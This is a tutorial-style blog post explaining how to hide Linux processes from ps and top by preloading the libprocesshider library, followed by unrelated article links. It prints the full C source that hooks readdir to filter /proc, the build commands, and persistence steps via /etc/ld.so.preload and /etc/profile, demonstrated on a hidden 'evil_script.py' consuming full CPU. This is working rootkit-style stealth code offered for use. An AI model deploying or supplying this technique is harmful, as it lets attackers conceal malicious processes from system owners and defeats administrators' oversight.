A method of hiding processes under Linux and the pitfalls encountered

Preface

1. The tools used in this article can be downloaded at https://github.com/gianlucaborello/libprocesshider

2. The idea is to use LD_PRELOAD to hijack system functions

What is LD_PRELOAD?

LD_PRELOAD is an environment variable of the Linux system, which can affect the runtime link of the program (Runtime linker). It allows you to define the dynamic link library that is loaded first before the program runs. This function is mainly used to selectively load the same functions in different dynamic link libraries. Through this environment variable, we can load other dynamic link libraries between the main program and its dynamic link library, and even overwrite the normal function library. On the one hand, we can use this function to use our own or better functions (without the need for other people's source code), and on the other hand, we can also inject programs into other people's programs to achieve specific purposes.

accomplish

1. Download the program and compile it

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2. Move the file to the /usr/local/lib/ directory

mv libprocesshider.so /usr/local/lib/

3. Load it into the global dynamic linker

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

test

1. We run evil_script.py

2. At this time, it is found that evil_script.py cannot be found in top and ps

At this time, we found that the CPU was 100%, but we could not find any program that occupied a high CPU.

analyze

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if (fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir) \
static struct dirent* (*original_##readdir)(DIR*) = NULL; \
struct dirent* readdir(DIR *dirp) \
{ \
  if(original_##readdir == NULL) { \
    original_##readdir = dlsym(RTLD_NEXT, "readdir"); \
    if(original_##readdir == NULL) \
    { \
      fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
    } \
  } \
  struct dirent* dir; \
  while(1) \
  { \
    dir = original_##readdir(dirp); \
    if(dir) { \
      char dir_name[256]; \
      char process_name[256]; \
      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
        strcmp(dir_name, "/proc") == 0 && \
        get_process_name(dir->d_name, process_name) && \
        strcmp(process_name, process_to_filter) == 0) { \
        continue; \
      } \
    } \
    break; \
  } \
  return dir; \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1. The program defines a variable process_to_filter to control which process name is not displayed

2. Rewrite readdir,

strcmp(process_name, process_to_filter) == 0)

When the current process name is found to be the same as process_to_filter, continue the loop.

Pitfalls encountered

1. This program cannot be compiled in some Linux systems

Workaround

Delete one of the last two lines

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2. Used in some Linux

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
It will not take effect. At this time, we need to configure the environment variable shell bmfxgkpt-yhd:~# vi /etc/profile
Add a line shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

Summarize

The above is a method of hiding processes under Linux introduced by the editor and the pitfalls encountered. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website!

You may also be interested in:

One line of code teaches you how to hide Linux processes

<<: Example code for implementing WeChat account splitting with Nodejs

>>: MySQL 5.7 installation and configuration tutorial under CentOS7 (YUM)

How to change password and set password complexity policy in Ubuntu

Solve the grouping error Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated in MySQL versions greater than 5.7

reason: MySQL 5.7.5 and up implements detection o...

Ubuntu 18.04 does not prompt for password when installing MySQL and how to solve it

The installation of MySQL 5.7 on Ubuntu 1804 is i...

A method of hiding processes under Linux and the pitfalls encountered

How to change password and set password complexity policy in Ubuntu

Sample code for implementing radar chart with vue+antv

MySQL takes out the comma-separated values from a field to form a new field

JavaScript implements simple scroll window

Cross-host communication between docker containers-overlay-based implementation method

Introduction to HTML basic controls_PowerNode Java Academy

Detailed explanation of the solution for HTML layout with fixed left and right widths and adaptive middle

Detailed explanation of the relationship between Vue and VueComponent

Summary of Operator Operations That Are Very Error-Prone in JavaScript

translate(-50%,-50%) in CSS achieves horizontal and vertical centering effect

Recommend

The easiest way to create a new user and grant permissions to MySQL

How to implement the webpage anti-copying function (with cracking method)

How to successfully retrieve VMware Esxi root password after forgetting it

How to implement Docker volume mounting

Why do we need Map when we already have Object in JavaScript?

Analysis of Context application scenarios in React

Mysql sorting to get ranking example code

Analysis of the method of setting up scheduled tasks in mysql

Use Navicate to connect to MySQL on Alibaba Cloud Server

MySQL 5.7.20 free installation version configuration method graphic tutorial

uniapp project optimization methods and suggestions

Detailed explanation of table return and index coverage examples in MySQL

Introduction to who command examples in Linux

Solve the grouping error Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated in MySQL versions greater than 5.7

Ubuntu 18.04 does not prompt for password when installing MySQL and how to solve it